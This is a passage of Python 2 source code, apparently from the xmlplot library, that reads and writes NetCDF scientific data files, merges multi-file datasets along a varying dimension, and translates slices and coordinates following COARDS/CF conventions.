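#   parseNcTimeUnit('seconds since 2000-01-01 00:00:00')  # -> (1./86400., 2000-01-01 00:00 UTC)
#   parseNcTimeUnit('hours since 1990-1-1 0:0:0 -6')      # -> (1./24.,    1990-01-01 06:00 UTC)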
def getNcAttributes(obj):
"""Transparent access to the attributes of a NetCDF file or variable,
using the clean ncattrs method of NetCDF4 if available.
"""
if hasattr(obj,'ncattrs'): return obj.ncattrs()
names = dir(obj)
if 'close' in names:
# NetCDF file
return [name for name in names if name not in ('close','createDimension','createVariable','flush','sync')]
else:
# NetCDF variable
return [name for name in names if name not in ('assignValue','getValue','typecode')]
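# A minimal sketch of transparent attribute access (ncobj may be a NetCDF file or
# variable object from any of the supported backends):
#
#   for name in getNcAttributes(ncobj):
#       print '%s = %s' % (name,getattr(ncobj,name))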
def getNcData(ncvar,bounds=None,maskoutsiderange=True):
"""Returns a slab of values from a NetCDF variable, respecting several NetCDF attributes
such as missing value specifications, valid value ranges, time unit, etc.
"""
# Disable automatic masking [python-netcdf only!]
if hasattr(ncvar,'set_auto_maskandscale'): ncvar.set_auto_maskandscale(False)
if bounds:
# Bounds provided - read a slice.
if len(ncvar.shape)!=len(bounds): raise Exception('Number of provided slices (%i) does not match number of dimensions (%i).' % (len(bounds),len(ncvar.shape)))
dat = numpy.asarray(ncvar[bounds])
elif len(ncvar.shape)>0:
# Variable is non-scalar - read all data.
dat = numpy.asarray(ncvar[(slice(None),)*len(ncvar.shape)])
else:
# Variable is a scalar - read all data.
dat = numpy.asarray(ncvar.getValue())
# Start without mask, and define function for creating/updating mask
mask = None
def addmask(mask,newmask):
if mask is None:
mask = newmask
else:
mask |= newmask
return mask
def getAttribute(att,**kwargs):
if not hasattr(ncvar,att): return
val = getattr(ncvar,att)
try:
return numpy.asarray(val,**kwargs)
except:
print 'WARNING: NetCDF attribute "%s" cannot be cast to required data type (%s) and will therefore be ignored. Attribute type: %s. Attribute value: %s.' % (att,kwargs.get('dtype','unspecified'),type(val),val)
return None
# Process the various COARDS/CF variable attributes for missing data.
if maskoutsiderange:
minval,maxval = getAttribute('valid_min',dtype=dat.dtype),getAttribute('valid_max',dtype=dat.dtype)
valrange = getAttribute('valid_range',dtype=dat.dtype)
if valrange is not None:
if not len(valrange)==2:
print 'WARNING: NetCDF attribute "valid_range" must consist of two values, but contains %i. It will be ignored.' % len(ncvar.valid_range)
else:
if minval is None or valrange[0]>minval: minval = valrange[0]
if maxval is None or valrange[1]<maxval: maxval = valrange[1]
if minval is not None: mask = addmask(mask,dat<minval)
if maxval is not None: mask = addmask(mask,dat>maxval)
# Variable to receive the final fill value to use for masked array creation.
final_fill_value = None
# Interpret missing value attribute (may be a 1D array).
missingval = getAttribute('missing_value',dtype=dat.dtype)
if missingval is not None:
missingval.shape = (-1,)
for v in missingval: mask = addmask(mask,dat==v)
final_fill_value = missingval[0]
else:
missingval = ()
# Interpret fill value attribute.
fillval = getAttribute('_FillValue',dtype=dat.dtype)
if fillval is not None and fillval not in missingval:
mask = addmask(mask,dat==fillval)
final_fill_value = fillval
# Apply the combined mask (if any)
if mask is not None and mask.any(): dat = numpy.ma.masked_array(dat,mask=mask,copy=False,fill_value=final_fill_value)
# If we have to apply a transformation to the data, the final data type is defined by the
# transformation parameters. Cast the data array to that type if needed.
scale = getAttribute('scale_factor')
offset = getAttribute('add_offset')
targetdtype = None
if scale is not None:
targetdtype = numpy.asarray(scale).dtype
elif offset is not None:
targetdtype = numpy.asarray(offset).dtype
if targetdtype is not None and targetdtype!=dat.dtype:
dat = dat.astype(targetdtype)
# Apply transformation to data based on nc variable attributes.
if scale is not None and scale !=1.: dat *= scale
if offset is not None and offset!=0.: dat += offset
# If the unit is time, convert to internal time unit
if hasattr(ncvar,'units'):
timeref = None
try:
timeunit,timeref = parseNcTimeUnit(ncvar.units)
except ReferenceTimeParseError:
pass
if timeref is not None:
timeref = xmlplot.common.date2num(timeref)
if dat.dtype!=numpy.float64: dat = dat.astype(numpy.float64)
dat = timeref+timeunit*dat
return dat
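# Reading sketch for getNcData (hypothetical file and variable names; the slicing
# example assumes the variable is two-dimensional):
#
#   nc = openNetCDF('result.nc')
#   alldata = getNcData(nc.variables['temp'])                  # entire (masked/scaled) array
#   slab = getNcData(nc.variables['temp'],(0,slice(None)))     # first index of dimension 0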
class MultiNetCDFFile(object):
class CoordinatesIdenticalException(Exception): pass
class Variable(object):
def __init__(self,store,name):
self.store = store
self.name = name
self.ncvars = [nc.variables[name] for nc in self.store.ncs]
def __array__(self,*args,**kwargs):
return numpy.asarray(self[(Ellipsis,)],*args,**kwargs)
def __getitem__(self,indices):
if not isinstance(indices,(tuple,list)): indices = (indices,)
dims = list(self.dimensions)
idim = dims.index(self.store.variabledim)
shape = self.shape
indices = xmlplot.common.processEllipsis(indices,len(shape))
indices = list(indices)
if isinstance(indices[idim],slice):
istart,istop,istep = indices[idim].indices(shape[idim])
else:
istart = indices[idim]
istop = istart+1
data = []
for ivar,ncvar in enumerate(self.ncvars):
if istart>=ncvar.shape[idim]:
# Start position beyond current file.
istart -= ncvar.shape[idim]
istop -= ncvar.shape[idim]
else:
# Start position within current file.
if isinstance(indices[idim],int):
indices[idim] = istart
return ncvar[tuple(indices)]
#return getNcData(ncvar,tuple(indices))
if istop<=ncvar.shape[idim]:
# Stop position within current file
indices[idim] = slice(istart,istop,istep)
else:
# Stop position beyond current file
indices[idim] = slice(istart,None,istep)
left = (ncvar.shape[idim]-istart-1) % istep
istart = istep-left-1
istop -= ncvar.shape[idim]
data.append(ncvar[tuple(indices)])
#data.append(getNcData(ncvar,tuple(indices)))
if indices[idim].stop is not None: break
# Process overlap between current and next file.
if ivar<len(self.ncvars)-1:
istart += self.store.overlaps[ivar]
istop += self.store.overlaps[ivar]
return numpy.concatenate(data,axis=idim)
def ncattrs(self):
return getNcAttributes(self.ncvars[0])
def __getattr__(self,name):
if name=='shape':
return [self.store.dim2length[d] for d in self.ncvars[0].dimensions]
for ncvar in self.ncvars:
if hasattr(ncvar,name): return getattr(ncvar,name)
raise AttributeError(name)
class Variables(object,UserDict.DictMixin):
def __init__(self,store):
self.store = store
def __getitem__(self,name):
ncvar = self.store.ncs[0].variables[name]
if self.store.variabledim not in ncvar.dimensions: return ncvar
return MultiNetCDFFile.Variable(self.store,name)
def keys(self):
return self.store.ncs[0].variables.keys()
def __init__(self,*args,**kwargs):
paths = []
for arg in args:
paths += glob.glob(arg)
# Functions for comparing two dictionaries, capable of
# dealing with elements that are numpy arrays.
def cmpattributes(atts1,atts2):
match = set(atts1.iterkeys())==set(atts2.iterkeys())
if not match: return False
for k in atts1.iterkeys():
match = atts1[k]==atts2[k]
if hasattr(match,'all'): match = match.all()
if not match: return False
return True
# Open NetCDF files.
self.ncs = [getNetCDFFile(path) for path in paths]
# Get list of all dimensions and variables (unions over all files).
dims,vars = set(),set()
for nc in self.ncs:
dims.update(nc.dimensions.keys())
vars.update(nc.variables.keys())
# Check if all files use all dimensions and variables.
# For variables, also check if the variable attributes are identical everywhere.
dim2coords,var2attr = {},{}
self.variabledim = kwargs.get('dimension',None)
for nc,path in zip(self.ncs,paths):
# Check variables
for var in vars:
# Check for presence of variable.
assert var in nc.variables,'Variable %s does not appear in "%s". For multiple NetCDF files to be loaded as one single file, they must all contain the same variables.' % (var,path)
# Compare attributes
ncvar = nc.variables[var]
atts = dict([(k,getattr(ncvar,k)) for k in getNcAttributes(ncvar)])
if var not in var2attr:
var2attr[var] = atts
else:
assert cmpattributes(atts,var2attr[var]),'Current attributes of variable "%s" (%s) do not match its attributes in one of the other NetCDF files (%s).' % (var,atts,var2attr[var])
# Check dimensions
for dim in dims:
# Check for presence of dimension in dimensions and coordinate variables.
assert dim in nc.dimensions,'Dimension %s is missing in "%s". For multiple NetCDF files to be loaded as one single file, all must use the same dimensions.' % (dim,path)
# If no coordinate values are available, just continue with the next dimension.
# (we will not be able to determine the file order, so we accept the given order)
if dim not in nc.variables: continue
# Compare coordinate values.
coord = getNcData(nc.variables[dim])
if dim not in dim2coords:
dim2coords[dim] = coord
else:
if self.variabledim!=dim and (dim2coords[dim].shape!=coord.shape or numpy.any(dim2coords[dim]!=coord)):
# These coordinates vary between files - make sure this is the only dimension that differs.
assert self.variabledim is None,'More than one dimension (%s, %s) varies between files.' % (self.variabledim,dim)
self.variabledim = dim
# Make sure that the values of one dimension vary between files.
if self.variabledim is None:
raise MultiNetCDFFile.CoordinatesIdenticalException('All dimensions have the same coordinates in the supplied files. One dimension should differ between files in order for them to be loaded as a single file.')
# Sort NetCDF files based on their values for the varying dimension.
# Only works if we have the coordinate values for all files.
nc2coords = {}
for nc in self.ncs:
if self.variabledim in nc.variables: nc2coords[nc] = nc.variables[self.variabledim][0]
if len(nc2coords)==len(self.ncs):
self.ncs.sort(cmp=lambda x,y: cmp(nc2coords[x],nc2coords[y]))
# Determine the length of all dimensions in the merged file, and
# determine the overlap (if any) between the different files.
self.dim2length = dict([(k,len(v)) for k,v in dim2coords.iteritems()])
self.dim2length[self.variabledim] = 0
self.overlaps = []
lastcoord = None
for nc in self.ncs:
curcoord = getNcData(nc.variables[self.variabledim])
if lastcoord is not None:
overlap = curcoord.searchsorted(lastcoord[-1],side='right')
self.dim2length[self.variabledim] -= overlap
self.overlaps.append(overlap)
self.dim2length[self.variabledim] += len(curcoord)
lastcoord = curcoord
def ncattrs(self):
# Just return the NetCDF attributes of the first file.
return getNcAttributes(self.ncs[0])
def __getattr__(self,name):
if name=='dimensions':
return self.dim2length
elif name=='variables':
return MultiNetCDFFile.Variables(self)
# Request for a custom attribute - loop over all NetCDF files until it is found.
for nc in self.ncs:
if hasattr(nc,name): return getattr(nc,name)
raise AttributeError(name)
def close(self):
# Close all NetCDf files.
for nc in self.ncs: nc.close()
self.ncs = []
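# Combination sketch for MultiNetCDFFile (hypothetical paths): all files must contain
# the same variables and dimensions, and exactly one dimension must have coordinates
# that differ between files; that dimension is concatenated, with any overlap between
# consecutive files removed.
#
#   nc = MultiNetCDFFile('jan.nc','feb.nc','mar.nc')
#   print nc.dimensions['time']   # combined length of the varying dimension
#   nc.close()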
class NetCDFStore(xmlplot.common.VariableStore,xmlstore.util.referencedobject):
"""Class encapsulating a NetCDF file.
The file is expected to follow the COARDS convention.
"""
conventions = []
@staticmethod
def registerConvention(convention):
NetCDFStore.conventions.append(convention)
@staticmethod
def loadUnknownConvention(path):
try:
nc = openNetCDF(path)
except MultiNetCDFFile.CoordinatesIdenticalException:
results = [xmlplot.data.NetCDFStore(filepath) for filepath in glob.glob(path)]
return xmlplot.plot.MergedVariableStore(results,mergedimid='obs',mergedimname='observation')
for convention in NetCDFStore.conventions:
if convention.testFile(nc): return convention(nc)
return NetCDFStore(nc)
class NetCDFVariable(xmlplot.common.Variable):
def __init__(self,store,ncvarname):
xmlplot.common.Variable.__init__(self,store)
self.ncvarname = str(ncvarname)
def __str__(self):
return str(self.store)+'/'+self.ncvarname
def getName_raw(self):
return self.ncvarname
def setData(self,data,slic=(Ellipsis,),converttime=True):
assert self.store.mode in ('w','a','r+'),'NetCDF file has not been opened for writing.'
# Retrieve the NetCDF variable object.
nc = self.store.getcdf()
ncvar = nc.variables[self.ncvarname]
# Disable automatic masking and scaling [python-netcdf only!]
if hasattr(ncvar,'set_auto_maskandscale'): ncvar.set_auto_maskandscale(False)
# Process time units - if applicable.
if converttime and hasattr(ncvar,'units'):
timeref = None
try:
timeunit,timeref = parseNcTimeUnit(ncvar.units)
except ReferenceTimeParseError:
pass
if timeref is not None:
timeref = xmlplot.common.date2num(timeref)
data = numpy.asarray((data-timeref)/timeunit,dtype=self.getDataType())
# Process offset and scale value - if applicable.
if hasattr(ncvar,'add_offset'): data = data-ncvar.add_offset
if hasattr(ncvar,'scale_factor'): data = data/ncvar.scale_factor
# Fill masked values with designated missing value (if any).
if hasattr(data,'filled') and hasattr(ncvar,'_FillValue'): data = data.filled(ncvar._FillValue)
# If the internal storage type is integer, round the values to the nearest integer first.
if numpy.dtype(self.getDataType()).kind in 'iu': data = numpy.round(data)
# Save data to NetCDF variable.
ncvar[slic] = data
def getLongName(self):
nc = self.store.getcdf()
ncvar = nc.variables[self.ncvarname]
if hasattr(ncvar,'long_name'):
return ncvar.long_name
else:
return self.getName()
def getUnit(self):
nc = self.store.getcdf()
ncvar = nc.variables[self.ncvarname]
if not hasattr(ncvar,'units'): return ''
return xmlplot.common.convertUnitToUnicode(ncvar.units)
def getProperties(self):
nc = self.store.getcdf()
ncvar = nc.variables[self.ncvarname]
propnames = getNcAttributes(ncvar)
return dict([(key,getattr(ncvar,key)) for key in propnames])
def setProperty(self,name,value):
nc = self.store.getcdf()
ncvar = nc.variables[self.ncvarname]
setattr(ncvar,name,value)
def getDataType(self):
nc = self.store.getcdf()
ncvar = nc.variables[self.ncvarname]
if hasattr(ncvar,'dtype'): return ncvar.dtype
return ncvar.typecode()
def getCoordinateVariables(self):
props = self.getProperties()
dims = self.getDimensions_raw()
dim2coordvar = {}
# First try variable-specific links between dimensions and coordinates.
if 'coordinates' in props:
coordvars = []
coordvar2dims = {}
for name in props['coordinates'].split():
coordvar = self.store.getVariable_raw(name)
if coordvar is not None:
coorddims = coordvar.getDimensions_raw()
if all([(cd in dims) for cd in coorddims]):
coordvar2dims[coordvar] = coorddims
coordvars.append(coordvar)
for coordvar in sorted(coordvars,cmp=lambda x,y: cmp(len(coordvar2dims[x]),len(coordvar2dims[y]))):
for coorddim in reversed(coordvar2dims[coordvar]):
if coorddim not in dim2coordvar:
dim2coordvar[coorddim] = coordvar
break
# Set any missing coordinate variable to default.
for dim in dims:
if dim not in dim2coordvar:
coordname = self.store.defaultcoordinates.get(dim,dim)
coordvar = self.store.getVariable_raw(coordname)
if coordvar is not None and all([(cd in dims) for cd in coordvar.getDimensions_raw()]):
dim2coordvar[dim] = coordvar
return tuple([dim2coordvar.get(dim,None) for dim in dims])
def getDimensions_raw(self):
nc = self.store.getcdf()
ncvar = nc.variables[self.ncvarname]
return tuple(ncvar.dimensions)
def getShape(self):
nc = self.store.getcdf()
ncvar = nc.variables[self.ncvarname]
return ncvar.shape
def hasReversedDimensions(self):
return True
def translateSliceSpecification(self,bounds):
if not isinstance(bounds,(list,tuple)): bounds = (bounds,)
dimnames = list(self.getDimensions_raw())
shape = self.getShape()
# Process Ellipsis (if present) and check whether the number of boundaries matches the number of dimensions.
bounds = xmlplot.common.processEllipsis(bounds,len(dimnames))
assert len(bounds)==len(dimnames), 'Number of boundaries (%i) does not match number of dimensions (%i).' % (len(bounds),len(dimnames))
# Convert bounds to list of slice objects.
# Non-integer bounds are initially ignored; after retrieving the coordinate arrays, these are filled in.
boundindices,floatslices,floatindices = [],[],[]
for idim,bound in enumerate(bounds):
if isinstance(bound,int):
# Integer value provided as index.
assert bound>=-shape[idim], 'Slice index %i lies below the lowest possible index for dimension %s (%i).' % (bound,dimnames[idim],-shape[idim] )
assert bound< shape[idim], 'Slice index %i exceeds the highest possible index for dimension %s (%i).' % (bound,dimnames[idim], shape[idim]-1)
if bound<0: bound += shape[idim]
boundindices.append(bound)
elif not isinstance(bound,slice):
# Floating point value or other non-integer object provided as index.
boundindices.append(slice(0,shape[idim]))
floatindices.append(idim)
elif not (isinstance(bound.start,(int,types.NoneType)) and isinstance(bound.stop,(int,types.NoneType))):
# Non-integer slice specification (e.g., using floating point numbers or datetime objects).
assert bound.step is None,'Non-integer slices with explicitly specified step are not supported.'
boundindices.append(slice(0,shape[idim]))
floatslices.append(idim)
else:
# Normal (integer-based) slice specification
start,stop,step = bound.indices(shape[idim])
boundindices.append(slice(start,stop,step))
# Translate slices based on non-integer values (e.g. floating point values, dates)
# to slices based on integers.
for idim in floatslices:
dimname = dimnames[idim]
# Get the entire coordinate array
coordvar = self.store.getVariable_raw(dimname)
coorddims = list(coordvar.getDimensions())
coords = coordvar.getSlice([boundindices[dimnames.index(cd)] for cd in coorddims], dataonly=True, cache=True)
istart,istop = xmlplot.common.getboundindices(coords,coorddims.index(dimname),bounds[idim].start,bounds[idim].stop)
boundindices[idim] = slice(istart,istop,1)
# Translate indices based on non-integer values (e.g. floating point values, dates)
# to integer indices.
if floatindices:
floatdimnames = [dimnames[idim] for idim in floatindices]
newshape = [shape[idim] for idim in floatindices]
summeddistance = numpy.zeros(newshape,dtype=numpy.float)
for idim in floatindices:
bound = bounds[idim]
if isinstance(bound,datetime.datetime): bound = xmlplot.common.date2num(bound)
dimname = dimnames[idim]
coordvar = self.store.getVariable_raw(dimname)
coorddims = list(coordvar.getDimensions())
for cd in coorddims:
assert cd in dimnames,'Coordinate %s depends on %s, but the variable %s itself does not depend on %s.' % (dimname,cd,self.getName(),cd)
assert cd in floatdimnames,'A float index is provided for dimension %s, but not for dimension %s on which %s depends.' % (dimname,cd,dimname)
coords = coordvar.getSlice([boundindices[dimnames.index(cd)] for cd in coorddims], dataonly=True, cache=True)
coords = xmlplot.common.broadcastSelective(coords,coorddims,newshape,floatdimnames)
summeddistance += numpy.abs(coords-bound)
indices = numpy.unravel_index(summeddistance.argmin(), newshape)
for idim,index in zip(floatindices,indices): boundindices[idim] = index
return tuple(boundindices)
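# Illustration (hypothetical variable with dimensions time,lat,lon): non-integer
# indices such as datetime objects or floats are resolved against the coordinate
# arrays by the code above, so e.g.
#
#   var.translateSliceSpecification((datetime.datetime(2000,1,1),Ellipsis))
#
# yields a tuple containing only integer indices and integer-based slices.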
def getData(self,bounds=None,stagger=False):
# Discover effective boundaries
effbounds,newshape = [],[]
for b in self.translateSliceSpecification(bounds):
if isinstance(b,slice):
# Set the upper bound to 1 + the index of the last element that will be taken
b = slice(b.start,b.stop-(b.stop-b.start-1)%b.step,b.step)
effbounds.append(b)
# Convert stagger argument to list with dimension indices to stagger.
if not stagger:
stagger = ()
elif not isinstance(stagger,(list,tuple,set)):
stagger = range(len(effbounds))
stagger = [s for s in stagger if not isinstance(effbounds[s],int)]
shape = self.getShape()
newshape = []
for i,b in enumerate(effbounds):
if isinstance(b,slice):
l = 1+(b.stop-b.start-1)/b.step
if i in stagger: l+=1
else:
l = 1
newshape.append(l)
data = numpy.empty(newshape,dtype=numpy.float)
data = numpy.ma.array(data,mask=True,copy=False)
addborders = []
for i in range(len(effbounds)):
b = effbounds[i]
addleft,addright,addcenter = False,False,True
if i in stagger:
centers = b.step%2==0 # Use centers for interface coordinates if the stride is an even number.
start = b.start - b.step/2
stop = b.stop + b.step/2 + 1
if start<0:
start += b.step
addleft = True
if stop>shape[i]+1:
stop -= b.step
addright = True
if centers: stagger.remove(i)
addcenter = stop>start
effbounds[i] = slice(start,stop,b.step)
addborders.append((addleft,addcenter,addright))
def getdata(bounds,stag):
print 'Request for:'
for i,b in enumerate(bounds):
print ' ',b,(i in stag)
return 0.
def processdim(bounds,addborders,curslice,curstagger,curtarget):
if not bounds:
data[curtarget] = getdata(curslice,curstagger)
return
curbound = bounds[0]
if isinstance(curbound,int):
return processdim(bounds[1:],addborders[1:],curslice+[curbound],curstagger,curtarget)
addleft,addcenter,addright = addborders[0]
idim = len(curslice)
start,stop = None,None
if addleft:
start = 1
processdim(bounds[1:],addborders[1:],curslice+[0],curstagger+[idim],curtarget+[0])
if addright:
stop = -1
processdim(bounds[1:],addborders[1:],curslice+[-1],curstagger+[idim],curtarget+[-1])
if addcenter:
if idim in stagger: curstagger += [idim]
processdim(bounds[1:],addborders[1:],curslice+[curbound],curstagger,curtarget+[slice(start,stop)])
processdim(effbounds,addborders,[],[],[])
assert data._mask.sum()==0,'%i entries are still masked.' % data._mask.sum()
def getNcData(self,bounds=None):
# Get NetCDF file and variable objects.
nc = self.store.getcdf()
ncvar = nc.variables[self.ncvarname]
try:
dat = getNcData(ncvar,bounds,maskoutsiderange=self.store.maskoutsiderange)
except Exception,e:
strex = str(e)
if strex=='': strex = e.__class__.__name__
raise Exception('Unable to read data from netCDF variable "%s": %s' % (self.ncvarname,strex))
return dat
def getSlice(self,bounds=None,dataonly=False,cache=False,transfercoordinatemask=True):
if bounds is None: bounds = (Ellipsis,)
# Translate the slice specification so only slice objects and integer indices remain.
bounds = self.translateSliceSpecification(bounds)
# Retrieve the data values
n = 1L
for l in self.getShape(): n *= l
if cache and n<1000000:
# Take all data from cache if present, otherwise read all data from NetCDF and store it in cache first.
if self.ncvarname not in self.store.cachedcoords:
self.store.cachedcoords[self.ncvarname] = self.getNcData()
dat = self.store.cachedcoords[self.ncvarname]
if bounds:
assert len(bounds)==dat.ndim,'%s: number of data dimensions (%i) does not match number of provided slices (%i).' % (str(self),dat.ndim,len(bounds))
dat = dat[bounds]
else:
# Read the data slab directly from the NetCDF file.
dat = self.getNcData(bounds)
# Determine the expected shape of the returned data.
expectedshape = []
for b in bounds:
if isinstance(b,slice):
expectedshape.append((b.stop-b.start-1)/b.step+1)
expectedshape = tuple(expectedshape)
# netCDF4 pre 2010-07-12 incorrectly neglects to squeeze out singleton dimension of scalars.
# Therefore, ignore differences between expected and returned data shape if they are due to singleton dimensions.
if dat.shape!=expectedshape and [l for l in expectedshape if l>1]==[l for l in dat.shape if l>1]: dat.shape = expectedshape
# Check whether expected and returned data shapes match.
assert dat.shape==expectedshape,'%s: getNcData returned data with shape %s, while shape %s was requested.' % (self.getName(),dat.shape,expectedshape)
# If the caller wants the data values only, we are done: return the value array.
if dataonly: return dat
# Get dimension names
dimnames = list(self.getDimensions_raw())
# Create Variable.Slice object to hold coordinates and data.
newdimnames = [d for d,b in zip(dimnames,bounds) if isinstance(b,slice)]
varslice = self.Slice(newdimnames)
# Retrieve coordinate values
inewdim = 0
datamask = numpy.ma.getmask(dat)
for idim,coordvar in enumerate(self.getCoordinateVariables()):
# If we take a single index for this dimension, it will not be included in the output.
if (not transfercoordinatemask) and not isinstance(bounds[idim],slice): continue
coords = None
if coordvar is not None:
# Get coordinate values
coorddims = coordvar.getDimensions()
coordslice = [bounds[dimnames.index(cd)] for cd in coorddims]
coords = coordvar.getSlice(coordslice, dataonly=True, cache=True)
if numpy.all(coords==coords.flatten()[0]):
# All coordinate values are identical (e.g., because they are all masked) - ignore them.
coords = None
if coords is None:
# No coordinate variable available: auto-generate integers from 0 to dimension length-1.
if not isinstance(bounds[idim],slice): continue
coorddims = (dimnames[idim],)
coords = numpy.arange(bounds[idim].start,bounds[idim].stop,bounds[idim].step,dtype=numpy.float)
# Get the list of coordinate dimensions after the ones with single index have been sliced out.
newcoorddims = [cd for cd in coorddims if isinstance(bounds[dimnames.index(cd)],slice)]
# Transfer the coordinate mask to the data if desired.
coordmask = numpy.ma.getmask(coords)
if transfercoordinatemask and coordmask is not numpy.ma.nomask:
coordmask = xmlplot.common.broadcastSelective(coordmask,newcoorddims,dat.shape,newdimnames)
if datamask is numpy.ma.nomask:
datamask = coordmask
else:
datamask |= coordmask
# If we take a single index for this dimension, it will not be included in the output.
if not isinstance(bounds[idim],slice): continue
# Coordinates should not have a mask - undo the masking.
if coordmask is not numpy.ma.nomask:
coords = numpy.ma.getdata(coords)
# Locate variable that contains staggered [boundary] coordinates.
stagcoordvar = None
if coordvar is not None and 'bounds' in coordvar.getProperties():
# The variable itself points to a variable with staggered coordinates (CF convention: bounds attribute).
boundvar = coordvar.getProperties()['bounds']
stagcoordvar = self.store.getVariable_raw(boundvar)
if stagcoordvar is None: print 'WARNING: boundary values for coordinate variable %s are set to variable %s, but this variable is not present in the NetCDF file.' % (coordvar.getName(),boundvar)
class NetCDFWarning(Exception): pass
# Get staggered coordinates over entire domain
if stagcoordvar is not None:
try:
centshape = coordvar.getShape()
stagshape = stagcoordvar.getShape()
if len(stagshape)==len(centshape)+1: # CF convention: one extra dimension for the corner index
stagdata = stagcoordvar.getSlice(dataonly=True, cache=True)
newshape = [l+1 for l in centshape]
stagcoordvar = numpy.zeros(newshape)
if len(centshape)==1:
if stagshape[-1]!=2: raise NetCDFWarning('A 1D coordinate variable must have 2 boundaries per cell (not %i).' % (stagshape[-1],))
if stagshape[0]!=centshape[0]: raise NetCDFWarning('Lengths of the main dimension of interface (%i) and center coordinates (%i) do not match.' % (stagshape[0],centshape[0]))
stagcoordvar[:-1] = stagdata[:,0]
stagcoordvar[1: ] += stagdata[:,1]
stagcoordvar[1:-1] /= 2
elif len(centshape)==2:
if stagshape[-1]!=4: raise NetCDFWarning('A 2D coordinate variable must have 4 boundaries per cell (not %i).' % (stagshape[-1],))
stagcoordvar[ :-1, :-1] = stagdata[:,:,0]
stagcoordvar[ :-1,1: ] += stagdata[:,:,1]
stagcoordvar[1:, 1: ] += stagdata[:,:,2]
stagcoordvar[1: , :-1] += stagdata[:,:,3]
stagcoordvar[1:-1,:] /= 2
stagcoordvar[:,1:-1] /= 2
coordslice_stag = []
for slc in coordslice:
if isinstance(slc,slice):
# We take a subset of this dimension: extend the slice with 1.
coordslice_stag.append(slice(slc.start,slc.stop+slc.step,slc.step))
else:
# We take a single [centered] index from this dimension:
# Get the left and right bounds, so we can average them later.
coordslice_stag.append(slice(slc,slc+2))
if isinstance(stagcoordvar,numpy.ndarray):
coords_stag = stagcoordvar[coordslice_stag]
else:
coords_stag = stagcoordvar.getSlice(coordslice_stag, dataonly=True, cache=True)
# Undo the staggering of the dimensions that we take a single slice through
# by averaging the left- and right bounds.
for i in range(len(coordslice)-1,-1,-1):
if isinstance(coordslice[i],int): coords_stag = coords_stag.mean(axis=i)
# Coordinates should not have a mask - undo the masking.
if numpy.ma.is_masked(coords_stag):
coords_stag = numpy.ma.getdata(coords_stag)
except NetCDFWarning,e:
# Problem with the specified interface coordinates - fall back to auto-generated coordinates instead.
print e
stagcoordvar = None
if stagcoordvar is None:
# Auto-generate the staggered coordinates.
coords_stag = xmlplot.common.stagger(coords)
# Insert data dimensions where they are lacking in coordinate
coords = xmlplot.common.broadcastSelective(coords, newcoorddims,dat.shape, newdimnames)
coords_stag = xmlplot.common.broadcastSelective(coords_stag,newcoorddims,[l+1 for l in dat.shape],newdimnames)
# Assign coordinate values
varslice.coords [inewdim] = coords
varslice.coords_stag[inewdim] = coords_stag
inewdim += 1
# If center coordinates came with a mask, apply that same mask to the data.
if datamask is not numpy.ma.nomask:
dat = numpy.ma.masked_where(datamask,dat,copy=False)
varslice.data = dat
return varslice
def __init__(self,path=None,*args,**kwargs):
xmlstore.util.referencedobject.__init__(self)
xmlplot.common.VariableStore.__init__(self)
self.datafile = None
self.nc = None
self.mode = 'r'
self.cachedcoords = {}
self.defaultcoordinates = {}
# Whether to mask values outside the range specified by valid_min,valid_max,valid_range
# NetCDF variable attributes (as specified by CF convention)
self.maskoutsiderange = True
if path is not None:
if isinstance(path,(tuple,list,basestring)):
# Path to a NetCDF file is provided, or a list/tuple of paths.
self.load(path,*args,**kwargs)
else:
# Open NetCDF file is provided.
self.nc = path
self.autoReassignCoordinates()
self.relabelVariables()
def __str__(self):
if self.datafile is None: return ''
if isinstance(self.datafile,(list,tuple)): return ', '.join(self.datafile)
return self.datafile
def getDimensionInfo_raw(self,dimname):
dimname = self.defaultcoordinates.get(dimname,dimname)
res = xmlplot.common.VariableStore.getDimensionInfo_raw(self,dimname)
var = self.getVariable_raw(dimname)
if var is None: return res
res['label'] = var.getLongName()
res['unit'] = var.getUnit()
props = var.getProperties()
if dimname in ('z','z1'):
res['preferredaxis'] = 'y'
elif self.isTimeDimension(dimname):
res['datatype'] = 'datetime'
res['preferredaxis'] = 'x'
res['unit'] = ''
prefaxis = props.get('axis',None)
if prefaxis is not None:
res['preferredaxis'] = prefaxis
if props.get('positive','up')=='down':
res['reversed'] = True
return res
def save(self,path):
assert isinstance(self.datafile,basestring),'Only single NetCDF files can be saved.'
shutil.copyfile(self.datafile,path)
def unlink(self):
if self.nc is not None:
# Close NetCDF result file.
self.nc.close()
self.nc = None
self.datafile = None
def load(self,path,mode='r'):
# Store link to result file, and try to open the CDF file
self.datafile = path
self.mode = mode
nc = self.getcdf()
# Auto-reassign coordinates
self.autoReassignCoordinates()
# Re-label variables - this must be done after reassignments because relabel requests
# the variable names, which are then cached and never requested again. Variable names can
# depend on dimension reassignments, e.g., if some reassignments apply, extra coordinate
# variables may be added.
self.relabelVariables()
def autoReassignCoordinates(self):
self.defaultcoordinates = {}
def getcdf(self):
"""Returns a NetCDFFile file object representing the NetCDF file
at the path in self.datafile. The returned object should follow
Scientific.IO.NetCDFFile conventions.
"""
if self.nc is not None: return self.nc
assert self.datafile is not None, 'The path to the NetCDF file has not yet been set. This may imply that the object has been unlinked.'
self.nc = openNetCDF(self.datafile,self.mode)
return self.nc
def getVariableNames_raw(self):
return map(str,self.getcdf().variables.keys())
def getVariableLongNames_raw(self):
varnames = self.getVariableNames_raw()
nc = self.getcdf()
vardict = {}
for varname in varnames:
if varname not in nc.variables:
vardict[varname] = varname
continue
ncvar = nc.variables[varname]
if hasattr(ncvar,'long_name'):
vardict[varname] = ncvar.long_name
else:
vardict[varname] = varname
return vardict
def getVariable_raw(self,varname):
ncvarname = str(varname)
nc = self.getcdf()
if ncvarname not in nc.variables: return None
return self.NetCDFVariable(self,ncvarname)
def createDimension(self,dimname,length):
assert self.mode in ('w','a','r+'),'NetCDF file has not been opened for writing.'
nc = self.getcdf()
nc.createDimension(dimname, length)
def getProperties(self):
nc = self.getcdf()
return dict([(k,getattr(nc,k)) for k in getNcAttributes(nc)])
def setProperty(self,name,value):
setattr(self.getcdf(),name,value)
def addVariable(self,varName,dimensions,datatype='d',missingvalue=None):
assert self.mode in ('w','a','r+'),'NetCDF file has not been opened for writing.'
nc = self.getcdf()
if missingvalue is not None:
try:
# netcdf-python needs the fill value to be specified during variable creation.
ncvar = nc.createVariable(varName,datatype,dimensions,fill_value=missingvalue)
except:
ncvar = nc.createVariable(varName,datatype,dimensions)
setattr(ncvar,'_FillValue',missingvalue)
setattr(ncvar,'missing_value',missingvalue)
else:
